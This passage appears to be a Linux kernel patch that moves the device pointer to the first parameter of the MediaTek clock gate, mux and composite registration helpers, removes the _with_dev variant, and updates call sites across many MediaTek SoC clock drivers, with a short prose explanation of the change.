+--- a/drivers/clk/mediatek/clk-gate.c
++++ b/drivers/clk/mediatek/clk-gate.c
+@@ -152,12 +152,12 @@ const struct clk_ops mtk_clk_gate_ops_no_setclr_inv = {
+ };
+ EXPORT_SYMBOL_GPL(mtk_clk_gate_ops_no_setclr_inv);
+ 
+-static struct clk_hw *mtk_clk_register_gate(const char *name,
++static struct clk_hw *mtk_clk_register_gate(struct device *dev, const char *name,
+ 					 const char *parent_name,
+ 					 struct regmap *regmap, int set_ofs,
+ 					 int clr_ofs, int sta_ofs, u8 bit,
+ 					 const struct clk_ops *ops,
+-					 unsigned long flags, struct device *dev)
++					 unsigned long flags)
+ {
+ 	struct mtk_clk_gate *cg;
+ 	int ret;
+@@ -202,10 +202,9 @@ static void mtk_clk_unregister_gate(struct clk_hw *hw)
+ 	kfree(cg);
+ }
+ 
+-int mtk_clk_register_gates_with_dev(struct device_node *node,
+-				    const struct mtk_gate *clks, int num,
+-				    struct clk_hw_onecell_data *clk_data,
+-				    struct device *dev)
++int mtk_clk_register_gates(struct device *dev, struct device_node *node,
++			   const struct mtk_gate *clks, int num,
++			   struct clk_hw_onecell_data *clk_data)
+ {
+ 	int i;
+ 	struct clk_hw *hw;
+@@ -229,13 +228,13 @@ int mtk_clk_register_gates_with_dev(struct device_node *node,
+ 			continue;
+ 		}
+ 
+-		hw = mtk_clk_register_gate(gate->name, gate->parent_name,
++		hw = mtk_clk_register_gate(dev, gate->name, gate->parent_name,
+ 					    regmap,
+ 					    gate->regs->set_ofs,
+ 					    gate->regs->clr_ofs,
+ 					    gate->regs->sta_ofs,
+ 					    gate->shift, gate->ops,
+-					    gate->flags, dev);
++					    gate->flags);
+ 
+ 		if (IS_ERR(hw)) {
+ 			pr_err("Failed to register clk %s: %pe\n", gate->name,
+@@ -261,14 +260,6 @@ int mtk_clk_register_gates_with_dev(struct device_node *node,
+ 
+ 	return PTR_ERR(hw);
+ }
+-EXPORT_SYMBOL_GPL(mtk_clk_register_gates_with_dev);
+-
+-int mtk_clk_register_gates(struct device_node *node,
+-			   const struct mtk_gate *clks, int num,
+-			   struct clk_hw_onecell_data *clk_data)
+-{
+-	return mtk_clk_register_gates_with_dev(node, clks, num, clk_data, NULL);
+-}
+ EXPORT_SYMBOL_GPL(mtk_clk_register_gates);
+ 
+ void mtk_clk_unregister_gates(const struct mtk_gate *clks, int num,
+diff --git a/drivers/clk/mediatek/clk-gate.h b/drivers/clk/mediatek/clk-gate.h
+index d9897ef535284..1a46b4c56fc5d 100644
+--- a/drivers/clk/mediatek/clk-gate.h
++++ b/drivers/clk/mediatek/clk-gate.h
+@@ -50,15 +50,10 @@ struct mtk_gate {
+ #define GATE_MTK(_id, _name, _parent, _regs, _shift, _ops)		\
+ 	GATE_MTK_FLAGS(_id, _name, _parent, _regs, _shift, _ops, 0)
+ 
+-int mtk_clk_register_gates(struct device_node *node,
++int mtk_clk_register_gates(struct device *dev, struct device_node *node,
+ 			   const struct mtk_gate *clks, int num,
+ 			   struct clk_hw_onecell_data *clk_data);
+ 
+-int mtk_clk_register_gates_with_dev(struct device_node *node,
+-				    const struct mtk_gate *clks, int num,
+-				    struct clk_hw_onecell_data *clk_data,
+-				    struct device *dev);
+-
+ void mtk_clk_unregister_gates(const struct mtk_gate *clks, int num,
+ 			      struct clk_hw_onecell_data *clk_data);
+ 
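
The remaining MediaTek hunks are a mechanical call-site conversion for the
reworked helpers: the struct device pointer becomes the first parameter of
mtk_clk_register_gates() (and likewise for the mux and composite
registration helpers below), and the *_with_dev variant is dropped. A
before/after sketch of a typical caller, where clks, num and clk_data
stand in for each driver's own tables:

	/* before this patch */
	mtk_clk_register_gates(node, clks, num, clk_data);
	mtk_clk_register_gates_with_dev(node, clks, num, clk_data, dev);

	/* after: device first; NULL where no platform device exists */
	mtk_clk_register_gates(&pdev->dev, node, clks, num, clk_data);
	mtk_clk_register_gates(NULL, node, clks, num, clk_data);

Passing the device lets the clk core associate the provider with runtime
PM where one exists, while the device-less early-init paths keep passing
NULL.
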
+diff --git a/drivers/clk/mediatek/clk-mt2701-aud.c b/drivers/clk/mediatek/clk-mt2701-aud.c
+index 4287bd3f545ee..03ab212aa7f4e 100644
+--- a/drivers/clk/mediatek/clk-mt2701-aud.c
++++ b/drivers/clk/mediatek/clk-mt2701-aud.c
+@@ -127,8 +127,8 @@ static int clk_mt2701_aud_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_AUD_NR);
+ 
+-	mtk_clk_register_gates(node, audio_clks, ARRAY_SIZE(audio_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, audio_clks,
++			       ARRAY_SIZE(audio_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r) {
+diff --git a/drivers/clk/mediatek/clk-mt2701-eth.c b/drivers/clk/mediatek/clk-mt2701-eth.c
+index 601358748750e..924725d67c13e 100644
+--- a/drivers/clk/mediatek/clk-mt2701-eth.c
++++ b/drivers/clk/mediatek/clk-mt2701-eth.c
+@@ -51,8 +51,8 @@ static int clk_mt2701_eth_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_ETHSYS_NR);
+ 
+-	mtk_clk_register_gates(node, eth_clks, ARRAY_SIZE(eth_clks),
+-						clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, eth_clks,
++			       ARRAY_SIZE(eth_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt2701-g3d.c b/drivers/clk/mediatek/clk-mt2701-g3d.c
+index 8d1fc8e3336eb..501fb99bb41a2 100644
+--- a/drivers/clk/mediatek/clk-mt2701-g3d.c
++++ b/drivers/clk/mediatek/clk-mt2701-g3d.c
+@@ -45,7 +45,7 @@ static int clk_mt2701_g3dsys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_G3DSYS_NR);
+ 
+-	mtk_clk_register_gates(node, g3d_clks, ARRAY_SIZE(g3d_clks),
++	mtk_clk_register_gates(&pdev->dev, node, g3d_clks, ARRAY_SIZE(g3d_clks),
+ 			       clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+diff --git a/drivers/clk/mediatek/clk-mt2701-hif.c b/drivers/clk/mediatek/clk-mt2701-hif.c
+index edeeb033a2350..1ddefc21d6a0d 100644
+--- a/drivers/clk/mediatek/clk-mt2701-hif.c
++++ b/drivers/clk/mediatek/clk-mt2701-hif.c
+@@ -48,8 +48,8 @@ static int clk_mt2701_hif_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_HIFSYS_NR);
+ 
+-	mtk_clk_register_gates(node, hif_clks, ARRAY_SIZE(hif_clks),
+-						clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, hif_clks,
++			       ARRAY_SIZE(hif_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r) {
+diff --git a/drivers/clk/mediatek/clk-mt2701-mm.c b/drivers/clk/mediatek/clk-mt2701-mm.c
+index eb069f3bc9a2b..f4885dffb324f 100644
+--- a/drivers/clk/mediatek/clk-mt2701-mm.c
++++ b/drivers/clk/mediatek/clk-mt2701-mm.c
+@@ -76,8 +76,8 @@ static int clk_mt2701_mm_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MM_NR);
+ 
+-	mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks),
+-						clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++			       ARRAY_SIZE(mm_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt2701.c b/drivers/clk/mediatek/clk-mt2701.c
+index 00d2e81bdd43e..e80fe9c942eeb 100644
+--- a/drivers/clk/mediatek/clk-mt2701.c
++++ b/drivers/clk/mediatek/clk-mt2701.c
+@@ -679,14 +679,15 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 	mtk_clk_register_factors(top_fixed_divs, ARRAY_SIZE(top_fixed_divs),
+ 								clk_data);
+ 
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes),
+-				base, &mt2701_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt2701_clk_lock, clk_data);
+ 
+ 	mtk_clk_register_dividers(top_adj_divs, ARRAY_SIZE(top_adj_divs),
+ 				base, &mt2701_clk_lock, clk_data);
+ 
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+-						clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, top_clks,
++			       ARRAY_SIZE(top_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+@@ -789,8 +790,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 		}
+ 	}
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-						infra_clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), infra_clk_data);
+ 	mtk_clk_register_factors(infra_fixed_divs, ARRAY_SIZE(infra_fixed_divs),
+ 						infra_clk_data);
+ 
+@@ -902,11 +903,12 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+-						clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, peri_clks,
++			       ARRAY_SIZE(peri_clks), clk_data);
+ 
+-	mtk_clk_register_composites(peri_muxs, ARRAY_SIZE(peri_muxs), base,
+-			&mt2701_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, peri_muxs,
++				    ARRAY_SIZE(peri_muxs), base,
++				    &mt2701_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt2712-mm.c b/drivers/clk/mediatek/clk-mt2712-mm.c
+index ad6daa8f28a83..e5264f1ce60d0 100644
+--- a/drivers/clk/mediatek/clk-mt2712-mm.c
++++ b/drivers/clk/mediatek/clk-mt2712-mm.c
+@@ -117,8 +117,8 @@ static int clk_mt2712_mm_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MM_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks),
+-			clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++			       ARRAY_SIZE(mm_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt2712.c b/drivers/clk/mediatek/clk-mt2712.c
+index d6c2cc183b1a1..a0f0c9ed48d10 100644
+--- a/drivers/clk/mediatek/clk-mt2712.c
++++ b/drivers/clk/mediatek/clk-mt2712.c
+@@ -1320,12 +1320,13 @@ static int clk_mt2712_top_probe(struct platform_device *pdev)
+ 	mtk_clk_register_factors(top_early_divs, ARRAY_SIZE(top_early_divs),
+ 			top_clk_data);
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), top_clk_data);
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+-			&mt2712_clk_lock, top_clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt2712_clk_lock, top_clk_data);
+ 	mtk_clk_register_dividers(top_adj_divs, ARRAY_SIZE(top_adj_divs), base,
+ 			&mt2712_clk_lock, top_clk_data);
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+-			top_clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, top_clks,
++			       ARRAY_SIZE(top_clks), top_clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, top_clk_data);
+ 
+@@ -1344,8 +1345,8 @@ static int clk_mt2712_infra_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-			clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+@@ -1366,8 +1367,8 @@ static int clk_mt2712_peri_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+-			clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, peri_clks,
++			       ARRAY_SIZE(peri_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+@@ -1395,8 +1396,11 @@ static int clk_mt2712_mcu_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MCU_NR_CLK);
+ 
+-	mtk_clk_register_composites(mcu_muxes, ARRAY_SIZE(mcu_muxes), base,
+-			&mt2712_clk_lock, clk_data);
++	r = mtk_clk_register_composites(&pdev->dev, mcu_muxes,
++					ARRAY_SIZE(mcu_muxes), base,
++					&mt2712_clk_lock, clk_data);
++	if (r)
++		dev_err(&pdev->dev, "Could not register composites: %d\n", r);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt6765.c b/drivers/clk/mediatek/clk-mt6765.c
+index 2c6a52ff5564e..c4941523f5520 100644
+--- a/drivers/clk/mediatek/clk-mt6765.c
++++ b/drivers/clk/mediatek/clk-mt6765.c
+@@ -743,7 +743,7 @@ static int clk_mt6765_apmixed_probe(struct platform_device *pdev)
+ 
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
+ 
+-	mtk_clk_register_gates(node, apmixed_clks,
++	mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
+ 			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+@@ -782,10 +782,11 @@ static int clk_mt6765_top_probe(struct platform_device *pdev)
+ 				    clk_data);
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs),
+ 				 clk_data);
+-	mtk_clk_register_muxes(top_muxes, ARRAY_SIZE(top_muxes), node,
++	mtk_clk_register_muxes(&pdev->dev, top_muxes,
++			       ARRAY_SIZE(top_muxes), node,
+ 			       &mt6765_clk_lock, clk_data);
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, top_clks,
++			       ARRAY_SIZE(top_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+@@ -820,8 +821,8 @@ static int clk_mt6765_ifr_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	mtk_clk_register_gates(node, ifr_clks, ARRAY_SIZE(ifr_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, ifr_clks,
++			       ARRAY_SIZE(ifr_clks), clk_data);
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt6779-mm.c b/drivers/clk/mediatek/clk-mt6779-mm.c
+index eda8cbee3d234..2cccf62d3b36f 100644
+--- a/drivers/clk/mediatek/clk-mt6779-mm.c
++++ b/drivers/clk/mediatek/clk-mt6779-mm.c
+@@ -93,8 +93,8 @@ static int clk_mt6779_mm_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MM_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++			       ARRAY_SIZE(mm_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+diff --git a/drivers/clk/mediatek/clk-mt6779.c b/drivers/clk/mediatek/clk-mt6779.c
+index 39dadc9547088..7fe9d12b2dfdd 100644
+--- a/drivers/clk/mediatek/clk-mt6779.c
++++ b/drivers/clk/mediatek/clk-mt6779.c
+@@ -1223,7 +1223,7 @@ static int clk_mt6779_apmixed_probe(struct platform_device *pdev)
+ 
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
+ 
+-	mtk_clk_register_gates(node, apmixed_clks,
++	mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
+ 			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+@@ -1248,14 +1248,17 @@ static int clk_mt6779_top_probe(struct platform_device *pdev)
+ 
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), clk_data);
+ 
+-	mtk_clk_register_muxes(top_muxes, ARRAY_SIZE(top_muxes),
+-			       node, &mt6779_clk_lock, clk_data);
++	mtk_clk_register_muxes(&pdev->dev, top_muxes,
++			       ARRAY_SIZE(top_muxes), node,
++			       &mt6779_clk_lock, clk_data);
+ 
+-	mtk_clk_register_composites(top_aud_muxes, ARRAY_SIZE(top_aud_muxes),
+-				    base, &mt6779_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_aud_muxes,
++				    ARRAY_SIZE(top_aud_muxes), base,
++				    &mt6779_clk_lock, clk_data);
+ 
+-	mtk_clk_register_composites(top_aud_divs, ARRAY_SIZE(top_aud_divs),
+-				    base, &mt6779_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_aud_divs,
++				    ARRAY_SIZE(top_aud_divs), base,
++				    &mt6779_clk_lock, clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+@@ -1267,8 +1270,8 @@ static int clk_mt6779_infra_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+diff --git a/drivers/clk/mediatek/clk-mt6795-infracfg.c b/drivers/clk/mediatek/clk-mt6795-infracfg.c
+index df7eed6e071e3..8025d171d6923 100644
+--- a/drivers/clk/mediatek/clk-mt6795-infracfg.c
++++ b/drivers/clk/mediatek/clk-mt6795-infracfg.c
+@@ -101,7 +101,8 @@ static int clk_mt6795_infracfg_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+-	ret = mtk_clk_register_gates(node, infra_gates, ARRAY_SIZE(infra_gates), clk_data);
++	ret = mtk_clk_register_gates(&pdev->dev, node, infra_gates,
++				     ARRAY_SIZE(infra_gates), clk_data);
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt6795-mm.c b/drivers/clk/mediatek/clk-mt6795-mm.c
+index fd73f202f2925..eebb6143ada22 100644
+--- a/drivers/clk/mediatek/clk-mt6795-mm.c
++++ b/drivers/clk/mediatek/clk-mt6795-mm.c
+@@ -87,7 +87,8 @@ static int clk_mt6795_mm_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	ret = mtk_clk_register_gates(node, mm_gates, ARRAY_SIZE(mm_gates), clk_data);
++	ret = mtk_clk_register_gates(&pdev->dev, node, mm_gates,
++				     ARRAY_SIZE(mm_gates), clk_data);
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt6795-pericfg.c b/drivers/clk/mediatek/clk-mt6795-pericfg.c
+index cb28d35dad59b..08aaa9b09c363 100644
+--- a/drivers/clk/mediatek/clk-mt6795-pericfg.c
++++ b/drivers/clk/mediatek/clk-mt6795-pericfg.c
+@@ -109,11 +109,13 @@ static int clk_mt6795_pericfg_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+-	ret = mtk_clk_register_gates(node, peri_gates, ARRAY_SIZE(peri_gates), clk_data);
++	ret = mtk_clk_register_gates(&pdev->dev, node, peri_gates,
++				     ARRAY_SIZE(peri_gates), clk_data);
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+-	ret = mtk_clk_register_composites(peri_clks, ARRAY_SIZE(peri_clks), base,
++	ret = mtk_clk_register_composites(&pdev->dev, peri_clks,
++					  ARRAY_SIZE(peri_clks), base,
+ 					  &mt6795_peri_clk_lock, clk_data);
+ 	if (ret)
+ 		goto unregister_gates;
+diff --git a/drivers/clk/mediatek/clk-mt6795-topckgen.c b/drivers/clk/mediatek/clk-mt6795-topckgen.c
+index 2948dd1aee8fa..2ab8bf5d6d6d9 100644
+--- a/drivers/clk/mediatek/clk-mt6795-topckgen.c
++++ b/drivers/clk/mediatek/clk-mt6795-topckgen.c
+@@ -552,12 +552,14 @@ static int clk_mt6795_topckgen_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto unregister_fixed_clks;
+ 
+-	ret = mtk_clk_register_muxes(top_muxes, ARRAY_SIZE(top_muxes), node,
++	ret = mtk_clk_register_muxes(&pdev->dev, top_muxes,
++				     ARRAY_SIZE(top_muxes), node,
+ 				     &mt6795_top_clk_lock, clk_data);
+ 	if (ret)
+ 		goto unregister_factors;
+ 
+-	ret = mtk_clk_register_composites(top_aud_divs, ARRAY_SIZE(top_aud_divs), base,
++	ret = mtk_clk_register_composites(&pdev->dev, top_aud_divs,
++					  ARRAY_SIZE(top_aud_divs), base,
+ 					  &mt6795_top_clk_lock, clk_data);
+ 	if (ret)
+ 		goto unregister_muxes;
+diff --git a/drivers/clk/mediatek/clk-mt6797-mm.c b/drivers/clk/mediatek/clk-mt6797-mm.c
+index 99a63f46642fa..d5e9fe445e308 100644
+--- a/drivers/clk/mediatek/clk-mt6797-mm.c
++++ b/drivers/clk/mediatek/clk-mt6797-mm.c
+@@ -89,8 +89,8 @@ static int clk_mt6797_mm_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MM_NR);
+ 
+-	mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++			       ARRAY_SIZE(mm_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt6797.c b/drivers/clk/mediatek/clk-mt6797.c
+index b362e99c8f53c..0429a80f3cad7 100644
+--- a/drivers/clk/mediatek/clk-mt6797.c
++++ b/drivers/clk/mediatek/clk-mt6797.c
+@@ -398,7 +398,8 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 	mtk_clk_register_factors(top_fixed_divs, ARRAY_SIZE(top_fixed_divs),
+ 				 clk_data);
+ 
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
++	mtk_clk_register_composites(&pdev->dev, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
+ 				    &mt6797_clk_lock, clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+@@ -584,8 +585,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 		}
+ 	}
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-			       infra_clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), infra_clk_data);
+ 	mtk_clk_register_factors(infra_fixed_divs, ARRAY_SIZE(infra_fixed_divs),
+ 				 infra_clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt7622-aud.c b/drivers/clk/mediatek/clk-mt7622-aud.c
+index b17731fa11445..e9070d0bea8d6 100644
+--- a/drivers/clk/mediatek/clk-mt7622-aud.c
++++ b/drivers/clk/mediatek/clk-mt7622-aud.c
+@@ -114,8 +114,8 @@ static int clk_mt7622_audiosys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_AUDIO_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, audio_clks, ARRAY_SIZE(audio_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, audio_clks,
++			       ARRAY_SIZE(audio_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r) {
+diff --git a/drivers/clk/mediatek/clk-mt7622-eth.c b/drivers/clk/mediatek/clk-mt7622-eth.c
+index a60190e834186..ece0f7a7c5f62 100644
+--- a/drivers/clk/mediatek/clk-mt7622-eth.c
++++ b/drivers/clk/mediatek/clk-mt7622-eth.c
+@@ -69,8 +69,8 @@ static int clk_mt7622_ethsys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_ETH_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, eth_clks, ARRAY_SIZE(eth_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, eth_clks,
++			       ARRAY_SIZE(eth_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -91,8 +91,8 @@ static int clk_mt7622_sgmiisys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_SGMII_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, sgmii_clks, ARRAY_SIZE(sgmii_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, sgmii_clks,
++			       ARRAY_SIZE(sgmii_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt7622-hif.c b/drivers/clk/mediatek/clk-mt7622-hif.c
+index 55baa6d06a205..c57ac2273c4e2 100644
+--- a/drivers/clk/mediatek/clk-mt7622-hif.c
++++ b/drivers/clk/mediatek/clk-mt7622-hif.c
+@@ -80,8 +80,8 @@ static int clk_mt7622_ssusbsys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_SSUSB_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, ssusb_clks, ARRAY_SIZE(ssusb_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, ssusb_clks,
++			       ARRAY_SIZE(ssusb_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -102,8 +102,8 @@ static int clk_mt7622_pciesys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PCIE_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, pcie_clks, ARRAY_SIZE(pcie_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, pcie_clks,
++			       ARRAY_SIZE(pcie_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt7622.c b/drivers/clk/mediatek/clk-mt7622.c
+index eebbb87906930..67a296646722f 100644
+--- a/drivers/clk/mediatek/clk-mt7622.c
++++ b/drivers/clk/mediatek/clk-mt7622.c
+@@ -615,14 +615,15 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs),
+ 				 clk_data);
+ 
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes),
+-				    base, &mt7622_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt7622_clk_lock, clk_data);
+ 
+ 	mtk_clk_register_dividers(top_adj_divs, ARRAY_SIZE(top_adj_divs),
+ 				  base, &mt7622_clk_lock, clk_data);
+ 
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, top_clks,
++			       ARRAY_SIZE(top_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+@@ -635,8 +636,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	mtk_clk_register_cpumuxes(node, infra_muxes, ARRAY_SIZE(infra_muxes),
